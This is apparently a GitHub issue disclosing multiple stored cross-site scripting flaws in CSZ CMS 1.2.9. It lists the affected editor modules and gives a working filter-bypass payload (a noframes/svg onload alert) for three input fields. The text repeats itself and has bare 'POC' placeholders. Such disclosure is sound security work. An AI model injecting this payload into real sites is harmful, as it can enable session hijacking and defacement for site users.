You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Multiple Stored XSS Cross-Site Scripting on CSZ CMS 1.2.9
Login with editor account with rights to Forms Builder, XML Plugin Widgets, Statistic for link, Banner Manager, Carousel Widget, Pages Content, Language, Plugin Manager.
Forms Builder
- Add or edit Forms Builder:
Forms Name: <noframes><p title="</noframes><svg/onload=alert(document.domain)>">
POC
XML Plugin Widgets
- Add or edit Widgets:
Widget Name: <noframes><p title="</noframes><svg/onload=alert(document.domain)>">
POC
Statistic for link
- Add New Link:
URL: <noframes><p title="</noframes><svg/onload=alert(document.domain)>">```
Multiple Stored XSS Cross-Site Scripting on CSZ CMS 1.2.9
Login with editor account with rights to Forms Builder, XML Plugin Widgets, Statistic for link, Banner Manager, Carousel Widget, Pages Content, Language, Plugin Manager.
POC
POC
POC
POC
POC
POC
POC
POC
The text was updated successfully, but these errors were encountered: